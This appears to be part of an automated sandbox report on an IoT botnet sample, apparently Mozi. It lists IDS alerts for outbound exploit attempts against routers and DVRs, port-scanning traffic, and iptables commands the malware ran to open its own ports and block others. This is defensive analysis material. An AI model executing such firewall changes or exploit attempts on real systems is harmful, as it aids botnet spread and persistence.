                Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:50064 -> 107.20.106.251:80
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.20:52998 -> 116.206.55.142:52869
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:35196 -> 104.115.250.114:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:35196 -> 104.115.250.114:80
                Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.115.250.114:80 -> 192.168.2.20:35196
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 129.16.2.234: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.152.114.5: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 168.95.157.5: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.59.216.67: -> 192.168.2.20:
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 154.95.78.148: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:47542 -> 45.196.102.179:80
                Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:47542 -> 45.196.102.179:80
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 31.150.96.14: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.165.182.127: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:37970 -> 175.252.8.184:8080
                Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:37970 -> 175.252.8.184:8080
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 211.227.96.15:57445 -> 192.168.2.20:14165
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 149.11.89.129: -> 192.168.2.20:
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 134.97.128.247: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.37.130.69: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:42922 -> 23.96.36.243:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:42922 -> 23.96.36.243:80
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 94.218.155.42: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.155.180.12: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 4.16.0.234: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 193.203.0.195: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:44286 -> 34.117.168.156:80
                Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:51602 -> 104.98.58.115:80
                Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:51602 -> 104.98.58.115:80
                Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.98.58.115:80 -> 192.168.2.20:51602
                Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:47394 -> 15.206.172.134:80
                Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:47394 -> 15.206.172.134:80
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 107.164.203.92: -> 192.168.2.20:
                Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.218.46.16:80 -> 192.168.2.20:60196
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:60196 -> 23.218.46.16:80
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.192.4.224: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:60130 -> 99.61.64.177:8080
                Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:60130 -> 99.61.64.177:8080
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.210.243.211: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 217.196.225.4: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 24.215.105.193: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 217.92.141.24: -> 192.168.2.20:
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 187.18.116.82: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 216.221.97.226: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 203.116.7.190: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:44974 -> 192.155.170.244:80
                Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:44974 -> 192.155.170.244:80
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.148.141.21: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:57262 -> 51.178.69.101:80
                Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:53646 -> 184.31.173.81:80
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:53236 -> 66.201.89.13:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:53236 -> 66.201.89.13:80
                Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:53646 -> 184.31.173.81:80
                Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 184.31.173.81:80 -> 192.168.2.20:53646
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 222.227.19.236: -> 192.168.2.20:
                Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.218.148.138:80 -> 192.168.2.20:46816
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:46816 -> 23.218.148.138:80
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:59382 -> 45.195.180.141:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:59382 -> 45.195.180.141:80
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:55652 -> 38.87.83.34:80
                Connects to many ports of the same IP (likely port scanning)Show sources
                Source: global trafficTCP traffic: 133.162.173.63 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 112.127.196.238 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 43.143.2.136 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 197.181.82.192 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 146.149.143.40 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 109.196.110.179 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 50.74.153.237 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 141.145.10.198 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 7.39.247.208 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 11.90.50.158 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 182.104.216.147 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 103.36.247.14 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 72.80.79.250 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 195.12.213.244 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 11.229.75.234 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 162.68.221.250 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 16.65.75.160 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 82.24.32.9 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 20.162.77.171 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 1.30.247.172 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 53.96.67.14 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 200.240.85.208 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 54.24.9.195 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 39.174.77.150 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 86.99.33.243 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 220.149.177.74 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 168.246.111.26 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 36.138.107.187 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 81.141.9.101 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 36.77.151.76 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 220.248.226.183 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 186.119.243.90 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 183.132.135.144 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 82.65.114.102 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 206.186.242.243 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 68.124.102.212 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 108.77.7.163 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 149.189.159.233 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 139.220.80.168 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 182.157.115.73 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 89.4.36.102 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 29.202.233.5 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 121.189.109.57 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 214.108.114.69 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 111.83.52.99 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 108.73.168.86 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 11.202.4.51 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 158.202.85.201 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 108.86.208.185 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 218.184.12.7 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 182.58.239.246 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 123.237.248.195 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 49.44.95.153 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 86.150.240.234 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 14.134.169.239 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 189.5.233.211 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 41.206.221.126 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 174.252.187.249 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 38.24.144.193 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 24.29.191.22 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 122.246.229.135 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 93.175.160.79 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 180.194.184.80 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 14.73.117.144 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 201.84.237.163 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 180.56.86.107 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 208.202.72.240 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 1.212.26.57 ports 2,5,6,8,9,52869
                Executes the "iptables" command to insert, remove and/or manipulate rulesShow sources
                Source: /bin/sh (PID: 4618)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4652)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4655)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4699)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4708)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4736)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4742)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4761)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4877)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                Source: /bin/sh (PID: 4880)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                Source: /bin/sh (PID: 4883)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
                Source: /bin/sh (PID: 4892)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                Source: /bin/sh (PID: 4950)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                Source: /bin/sh (PID: 4985)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                Source: /bin/sh (PID: 5011)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                Source: /bin/sh (PID: 5014)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                Source: /bin/sh (PID: 5019)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                Source: /bin/sh (PID: 5044)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                Source: /bin/sh (PID: 5079)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
                Source: /bin/sh (PID: 5105)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
                Source: /bin/sh (PID: 5121)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                Source: /bin/sh (PID: 5144)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                Source: /bin/sh (PID: 5152)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
                Source: /bin/sh (PID: 5183)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                Source: /bin/sh (PID: 5201)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5204)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5207)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5211)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5232)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 14165 -j ACCEPT
                Source: /bin/sh (PID: 5268)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 14165 -j ACCEPT
                Source: /bin/sh (PID: 5303)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 14165 -j ACCEPT
                Source: /bin/sh (PID: 5333)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 14165 -j ACCEPT
                Uses known network protocols on non-standard portsShow sources
                Source: unknownNetwork traffic detected: HTTP traffic on port 34926 -> 49152
                Source: unknownNetwork traffic detected: HTTP traffic on port 49152 -> 34926
                Source: unknownNetwork traffic detected: HTTP traffic on port 52998 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 52998 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 52998 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 52998 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 52998 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 52998 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 52998 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 52998 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 40718 -> 8443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52998 -> 52869
                Source: global trafficTCP traffic: 192.168.2.20:53930 -> 162.234.162.7:8080
                Source: global trafficTCP traffic: 192.168.2.20:32874 -> 49.44.95.153:37215
                Source: global trafficTCP traffic: 192.168.2.20:45040 -> 155.152.8.152:5555
                Source: global trafficTCP traffic: 192.168.2.20:54864 -> 214.112.173.213:8080
                Source: global trafficTCP traffic: 192.168.2.20:41280 -> 206.186.242.243:52869
                Source: global trafficTCP traffic: 192.168.2.20:38186 -> 201.254.11.90:8443
                Source: global trafficTCP traffic: 192.168.2.20:39510 -> 120.148.200.141:8080
                Source: global trafficTCP traffic: 192.168.2.20:40668 -> 182.58.239.246:49152
                Source: global trafficTCP traffic: 192.168.2.20:46862 -> 68.124.102.212:52869
                Source: global trafficTCP traffic: 192.168.2.20:44208 -> 94.194.209.135:7574
                Source: global trafficTCP traffic: 192.168.2.20:52130 -> 11.202.4.51:37215
                Source: global trafficTCP traffic: 192.168.2.20:51644 -> 198.228.200.241:5555
                Source: global trafficTCP traffic: 192.168.2.20:46806 -> 24.29.191.22:52869
                Source: global trafficTCP traffic: 192.168.2.20:35266 -> 35.119.229.43:8080
                Source: global trafficTCP traffic: 192.168.2.20:33912 -> 121.130.73.42:8080
                Source: global trafficTCP traffic: 192.168.2.20:46234 -> 186.54.121.35:5555
                Source: global trafficTCP traffic: 192.168.2.20:58224 -> 190.127.144.31:7574
                Source: global trafficTCP traffic: 192.168.2.20:52814 -> 128.70.68.149:7574
                Source: global trafficTCP traffic: 192.168.2.20:44062 -> 76.44.19.56:8080
                Source: global trafficTCP traffic: 192.168.2.20:53710 -> 131.221.67.66:5555
                Source: global trafficTCP traffic: 192.168.2.20:38362 -> 26.221.252.159:8080
                Source: global trafficTCP traffic: 192.168.2.20:47266 -> 218.184.12.7:52869
                Source: global trafficTCP traffic: 192.168.2.20:55354 -> 98.38.174.140:8443
                Source: global trafficTCP traffic: 192.168.2.20:59778 -> 57.122.76.123:8443
                Source: global trafficTCP traffic: 192.168.2.20:44380 -> 153.254.249.142:8080
                Source: global trafficTCP traffic: 192.168.2.20:38056 -> 75.81.234.138:81
                Source: global trafficTCP traffic: 192.168.2.20:57728 -> 205.200.160.114:5555
                Source: global trafficTCP traffic: 192.168.2.20:43516 -> 82.24.32.9:49152
                Source: global trafficTCP traffic: 192.168.2.20:42884 -> 195.12.213.244:49152
                Source: global trafficTCP traffic: 192.168.2.20:49038 -> 3.210.135.11:7574
                Source: global trafficTCP traffic: 192.168.2.20:52316 -> 162.110.153.1:81
                Source: global trafficTCP traffic: 192.168.2.20:33986 -> 120.94.211.11:81
                Source: global trafficTCP traffic: 192.168.2.20:37130 -> 137.170.59.38:8080
                Source: global trafficTCP traffic: 192.168.2.20:39206 -> 81.4.149.202:81
                Source: global trafficTCP traffic: 192.168.2.20:60310 -> 23.238.107.169:8080
                Source: global trafficTCP traffic: 192.168.2.20:40898 -> 171.254.103.135:8443
                Source: global trafficTCP traffic: 192.168.2.20:48228 -> 7.39.247.208:37215
                Source: global trafficTCP traffic: 192.168.2.20:54230 -> 125.223.44.138:8080
                Source: global trafficTCP traffic: 192.168.2.20:34912 -> 146.247.28.72:81
                Source: global trafficTCP traffic: 192.168.2.20:60270 -> 38.24.144.193:52869
                Source: global trafficTCP traffic: 192.168.2.20:38266 -> 81.141.9.101:49152
                Source: global trafficTCP traffic: 192.168.2.20:33558 -> 175.250.213.121:81
                Source: global trafficTCP traffic: 192.168.2.20:48800 -> 145.144.180.237:7574
                Source: global trafficTCP traffic: 192.168.2.20:39344 -> 153.76.243.35:5555
                Source: global trafficTCP traffic: 192.168.2.20:34490 -> 18.106.206.85:8080
                Source: global trafficTCP traffic: 192.168.2.20:42070 -> 134.169.30.105:8080
                Source: global trafficTCP traffic: 192.168.2.20:34706 -> 19.144.174.109:7574
                Source: global trafficTCP traffic: 192.168.2.20:37906 -> 82.65.114.102:37215
                Source: global trafficTCP traffic: 192.168.2.20:48466 -> 106.15.186.130:81
                Source: global trafficTCP traffic: 192.168.2.20:57956 -> 139.119.181.153:8080
                Source: global trafficTCP traffic: 192.168.2.20:59544 -> 216.76.72.47:8080
                Source: global trafficTCP traffic: 192.168.2.20:46178 -> 86.99.33.243:52869
                Source: global trafficTCP traffic: 192.168.2.20:43980 -> 63.159.4.132:8443
                Source: global trafficTCP traffic: 192.168.2.20:46258 -> 220.248.226.183:37215
                Source: global trafficTCP traffic: 192.168.2.20:55804 -> 26.194.71.217:8080
                Source: global trafficTCP traffic: 192.168.2.20:53546 -> 220.149.177.74:49152
                Source: global trafficTCP traffic: 192.168.2.20:53472 -> 105.66.122.27:8080
                Source: global trafficTCP traffic: 192.168.2.20:38196 -> 89.235.112.28:8080
                Source: global trafficTCP traffic: 192.168.2.20:59376 -> 29.135.222.49:5555
                Source: global trafficTCP traffic: 192.168.2.20:49524 -> 208.202.72.240:49152
                Source: global trafficTCP traffic: 192.168.2.20:41642 -> 165.172.98.68:8080
                Source: global trafficTCP traffic: 192.168.2.20:54830 -> 53.96.67.14:37215
                Source: global trafficTCP traffic: 192.168.2.20:47544 -> 133.162.173.63:49152
                Source: global trafficTCP traffic: 192.168.2.20:33566 -> 215.146.210.187:8080
                Source: global trafficTCP traffic: 192.168.2.20:37786 -> 141.205.147.62:8443
                Source: global trafficTCP traffic: 192.168.2.20:34070 -> 41.206.221.126:37215
                Source: global trafficTCP traffic: 192.168.2.20:44146 -> 213.246.220.122:81
                Source: global trafficTCP traffic: 192.168.2.20:58358 -> 214.101.231.205:81
                Source: global trafficTCP traffic: 192.168.2.20:50404 -> 195.47.32.35:8080
                Source: global trafficTCP traffic: 192.168.2.20:38920 -> 206.85.0.219:8080
                Source: global trafficTCP traffic: 192.168.2.20:51488 -> 193.139.114.52:8080
                Source: global trafficTCP traffic: 192.168.2.20:38382 -> 21.39.93.98:8443
                Source: global trafficTCP traffic: 192.168.2.20:51278 -> 50.74.153.237:52869
                Source: global trafficTCP traffic: 192.168.2.20:45418 -> 219.2.155.95:5555
                Source: global trafficTCP traffic: 192.168.2.20:46712 -> 20.162.94.18:7574
                Source: global trafficTCP traffic: 192.168.2.20:43384 -> 188.213.189.127:8080
                Source: global trafficTCP traffic: 192.168.2.20:39208 -> 189.5.233.211:52869
                Source: global trafficTCP traffic: 192.168.2.20:38928 -> 14.134.169.239:37215
                Source: global trafficTCP traffic: 192.168.2.20:50198 -> 205.163.228.224:8080
                Source: global trafficTCP traffic: 192.168.2.20:57468 -> 180.194.184.80:37215
                Source: global trafficTCP traffic: 192.168.2.20:47588 -> 46.184.71.253:81
                Source: global trafficTCP traffic: 192.168.2.20:57734 -> 166.226.181.7:81
                Source: global trafficTCP traffic: 192.168.2.20:38664 -> 11.49.92.66:5555
                Source: global trafficTCP traffic: 192.168.2.20:40490 -> 218.130.134.16:81
                Source: global trafficTCP traffic: 192.168.2.20:54756 -> 37.137.249.121:7574
                Source: global trafficTCP traffic: 192.168.2.20:43198 -> 72.80.79.250:52869
                Source: global trafficTCP traffic: 192.168.2.20:56426 -> 201.84.237.163:52869
                Source: global trafficTCP traffic: 192.168.2.20:55458 -> 20.162.77.171:37215
                Source: global trafficTCP traffic: 192.168.2.20:35700 -> 146.179.187.237:5555
                Source: global trafficTCP traffic: 192.168.2.20:33184 -> 1.212.26.57:52869
                Source: global trafficTCP traffic: 192.168.2.20:52734 -> 43.26.128.77:8080
                Source: global trafficTCP traffic: 192.168.2.20:53056 -> 183.59.13.157:8080
                Source: global trafficTCP traffic: 192.168.2.20:58196 -> 185.217.113.203:81
                Source: global trafficTCP traffic: 192.168.2.20:47214 -> 180.56.86.107:52869
                Source: global trafficTCP traffic: 192.168.2.20:50330 -> 158.202.85.201:52869
                Source: global trafficTCP traffic: 192.168.2.20:38764 -> 11.25.85.171:5555
                Source: global trafficTCP traffic: 192.168.2.20:40872 -> 123.154.185.48:81
                Source: global trafficTCP traffic: 192.168.2.20:58848 -> 106.38.123.170:81
                Source: global trafficTCP traffic: 192.168.2.20:57094 -> 55.5.67.170:7574
                Source: global trafficTCP traffic: 192.168.2.20:50086 -> 111.83.52.99:52869
                Source: global trafficTCP traffic: 192.168.2.20:43996 -> 209.98.175.169:8080
                Source: global trafficTCP traffic: 192.168.2.20:37214 -> 181.240.28.129:8443
                Source: global trafficTCP traffic: 192.168.2.20:49382 -> 112.127.196.238:52869
                Source: global trafficTCP traffic: 192.168.2.20:36522 -> 176.84.199.60:7574
                Source: global trafficTCP traffic: 192.168.2.20:54392 -> 220.240.27.125:81
                Source: global trafficTCP traffic: 192.168.2.20:47752 -> 44.95.144.199:8443
                Source: global trafficTCP traffic: 192.168.2.20:43164 -> 57.180.231.50:8080
                Source: global trafficTCP traffic: 192.168.2.20:51576 -> 162.68.221.250:49152
                Source: global trafficTCP traffic: 192.168.2.20:55320 -> 151.229.10.158:81
                Source: global trafficTCP traffic: 192.168.2.20:36522 -> 186.130.183.158:81
                Source: global trafficTCP traffic: 192.168.2.20:41408 -> 200.95.128.253:5555
                Source: global trafficTCP traffic: 192.168.2.20:43614 -> 84.154.75.217:8080
                Source: global trafficTCP traffic: 192.168.2.20:49044 -> 110.105.102.228:8443
                Source: global trafficTCP traffic: 192.168.2.20:38892 -> 54.24.9.195:37215
                Source: global trafficTCP traffic: 192.168.2.20:43904 -> 41.201.36.195:81
                Source: global trafficTCP traffic: 192.168.2.20:59424 -> 11.90.50.158:52869
                Source: global trafficTCP traffic: 192.168.2.20:35034 -> 136.156.51.131:8080
                Source: global trafficTCP traffic: 192.168.2.20:43350 -> 144.192.99.206:8443
                Source: global trafficTCP traffic: 192.168.2.20:43478 -> 222.236.93.57:8443
                Source: global trafficTCP traffic: 192.168.2.20:41992 -> 83.163.237.112:49152
                Source: global trafficTCP traffic: 192.168.2.20:40334 -> 4.249.179.26:5555
                Source: global trafficTCP traffic: 192.168.2.20:59764 -> 97.66.52.185:5555
                Source: global trafficTCP traffic: 192.168.2.20:47564 -> 82.37.108.31:8443
                Source: global trafficTCP traffic: 192.168.2.20:33110 -> 80.245.8.70:8443
                Source: global trafficTCP traffic: 192.168.2.20:43298 -> 103.36.247.14:37215
